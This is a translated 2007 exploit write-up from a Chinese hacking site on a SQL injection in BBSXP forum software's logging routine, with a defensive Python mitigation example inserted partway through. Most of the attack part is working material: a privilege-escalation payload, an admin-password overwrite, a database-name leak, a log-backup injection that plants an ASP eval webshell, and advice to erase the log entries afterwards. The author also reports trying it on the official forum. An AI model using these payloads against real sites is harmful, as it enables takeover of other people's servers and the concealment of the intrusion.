BBSXP latest version: another SQL 0day? - Vulnerability warning - Black Bar Safety Net (myhack58)

ID MYHACK58:62200715244
Type myhack58
Reporter Anonymous (佚名)
Modified 2007-04-27T00:00:00


BBSXP had a log-injection vulnerability a while ago, and a vulnerability is still present in the same place, the Log() sub:

    sub Log(Message)
        if Request.ServerVariables("Query_String") <> "" then Query_String = "?" & Request.ServerVariables("Query_String") & ""
        Conn.Execute("insert into [BBSXP_Log] (UserName,IPAddress,UserAgent,HttpVerb,PathAndQuery,Referrer,ErrDescription,POSTData,Notes) values ('" & CookieUserName & "','" & Request.ServerVariables("REMOTE_ADDR") & "','" & HTMLEncode(Request.ServerVariables("HTTP_User_AGENT")) & "','" & Request.ServerVariables("request_method") & "','http://" & Request.ServerVariables("server_name") & "" & Request.ServerVariables("script_name") & "" & Query_String & "','" & HTMLEncode(Request.ServerVariables("HTTP_REFERER")) & "','" & Err.Description & "','" & Request.Form & "','" & Message & "')")
    end sub

The previous vulnerability was in HTTP_REFERER, which the latest version now passes through HTMLEncode. But there is still one variable inside this Log() that we control: Request.Form. Register a user (xason), make a post, then edit it. The capture looks like this:

    POST sxp/editpost.asp?threadid=1&postid=1 HTTP/1.1
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
    Referer: http://localhost/bbsxp/edi...
    Accept-Language: zh-cn
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)
    Host: localhost
    Content-Length: 53
    Connection: Keep-Alive
    Cache-Control: no-cache
    Cookie: skins=1; Eremite=0; UserID=2; Userpass=1679707407E0FEDAA79EA80AB389A964; Onlinetime=2007%2D3%2D10+21%3A30%3A37; ForumNameList=%3Coption%20value%3D%27ShowForum.asp%3FForumID%3D1%27%3E%u7F51%u7EDC%3C/option%3E; ASPSESSIONIDSQCDCSQA=NBOPHAJCAIEFFCMHGDFJNKBH; ASPSESSIONIDSCTRRACA=OCIBAKBAFDDDJAADKKJBPBNI


Here Request.Form is content=test+log&UpFileID=&Category=&Subject=test+log. These variables have already been through HTMLEncode, but we can still find a way around it: we can forge a variable. For example, change

    content=test+log&UpFileID=&Category=&Subject=test+log

to

    content=test+log&UpFileID=&Category=&Subject=test+log&xason=love

Remember to adjust Content-Length. Open the bbsxp_log table and the POSTData column reads: content=test+log&UpFileID=&Category=&Subject=test+log&xason=love. See it? The forged variable xason went straight into the database. Because it is a bogus variable, it is naturally not subjected to any filtering.

From here the plan is clear: elevate privileges to administrator, enter the backend to find the site's physical path, then use a log backup to get a webshell.

Elevate privileges: change

    content=test+log&UpFileID=&Category=&Subject=test+log

to

    content=test+log&UpFileID=&Category=&Subject=test+log&xason=love',");update bbsxp_users set userroleid=1 where username='xason'--

and xason becomes a front-end administrator.
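The root cause in Log() is that Request.Form is concatenated into the INSERT as text, so the log table becomes an injection sink and, as a side effect, anything a client appends to the form body is recorded unfiltered. The following Python is an added example, not BBSXP's code: it models the BBSXP_Log insert with a parameterised statement (SQLite standing in for SQL Server) so that a forged field containing quotes or a stacked statement is stored inert, and it audits POSTData values against a per-script whitelist of expected form fields. The whitelist for editpost.asp is taken from the captured request on this page; the table schemas, the role id 3 and the other names are assumptions made for the example.

```python
import sqlite3
from urllib.parse import unquote_plus

# Hypothetical per-script whitelist of form fields. The editpost.asp entry comes
# from the captured request on this page; everything else here is assumed.
EXPECTED_FIELDS = {
    "editpost.asp": {"content", "UpFileID", "Category", "Subject"},
}

# Substrings that have no business inside a forum post's form values.
SQL_MARKERS = ("'", ";", "--", "update ", "insert ", "alter ", "backup ")


def split_form(post_data):
    """Split a raw application/x-www-form-urlencoded body into (name, value) pairs.

    Done by hand instead of urllib.parse.parse_qsl so the result is identical on
    every Python 3 release (older releases also split on ';', which would hide
    a stacked statement from the audit below).
    """
    pairs = []
    for part in post_data.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def audit_post_data(script_name, post_data):
    """Return findings for one POSTData value logged for script_name."""
    expected = EXPECTED_FIELDS.get(script_name, set())
    findings = []
    for name, value in split_form(post_data):
        if name not in expected:
            findings.append("unexpected field %r" % name)
        if any(marker in value.lower() for marker in SQL_MARKERS):
            findings.append("sql metacharacters in field %r" % name)
    return findings


def open_log_db():
    """In-memory stand-in for the BBSXP tables (constructed for this example)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE BBSXP_Log (UserName TEXT, IPAddress TEXT, POSTData TEXT, Notes TEXT)"
    )
    conn.execute("CREATE TABLE bbsxp_users (username TEXT, userroleid INTEGER)")
    conn.execute("INSERT INTO bbsxp_users VALUES ('xason', 3)")  # assumed ordinary-user role id
    return conn


def log_request(conn, username, ip, post_data, message):
    """Parameterised replacement for the string-built INSERT in Log().

    The driver sends the values separately from the statement text, so quotes
    or a stacked statement inside POSTData are stored verbatim, never executed.
    """
    conn.execute(
        "INSERT INTO BBSXP_Log (UserName, IPAddress, POSTData, Notes) VALUES (?, ?, ?, ?)",
        (username, ip, post_data, message),
    )
    conn.commit()


def stored_post_data(conn):
    return [row[0] for row in conn.execute("SELECT POSTData FROM BBSXP_Log")]


def role_of(conn, username):
    row = conn.execute(
        "SELECT userroleid FROM bbsxp_users WHERE username = ?", (username,)
    ).fetchone()
    return row[0]


# Constructed sample bodies: the normal body, the forged-field body and the
# privilege-escalation body quoted on this page.
NORMAL = "content=test+log&UpFileID=&Category=&Subject=test+log"
FORGED = NORMAL + "&xason=love"
INJECTED = NORMAL + "&xason=love',\");update bbsxp_users set userroleid=1 where username='xason'--"


if __name__ == "__main__":
    conn = open_log_db()
    for body in (NORMAL, FORGED, INJECTED):
        log_request(conn, "xason", "127.0.0.1", body, "editpost")
        print(body, "->", audit_post_data("editpost.asp", body))
    print(stored_post_data(conn))
    print("role of xason:", role_of(conn, "xason"))
```

Run as a script it logs all three bodies and shows that the role of xason stays unchanged: with the statement parameterised, the injected UPDATE is just text in the POSTData column. The audit function is the detection side of the same problem, and it is what you would run over an existing bbsxp_log table to find forged fields that were logged before the fix.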

To change the backend password: update bbsxp_sitesettings set adminpassword='md5 password'-- (BBSXP stores the MD5 of the password with the letters in uppercase).

To get the database name: update bbsxp_users set usermail=db_name() where username='xason'--

Log backup to get a webshell: alter database bbsxp set recovery full;drop table cmd;create table cmd (a image);backup log bbsxp to disk = 'c:\cmd' with init;insert into cmd(a) values ('<%eval request(chr(35)):response.end%>');backup log bbsxp to disk = 'C:\web\bbsxp\cmd.asp';--

If you change the backend password, remember to change it back, otherwise the administrator can no longer get into the backend; so it is best to obtain the administrator password instead. Finally, remember to clean up after yourself: delete * from bbsxp_log where username='xason'--

PS: I tested this on the official forum without success, I don't know why. But it succeeded in local and online tests!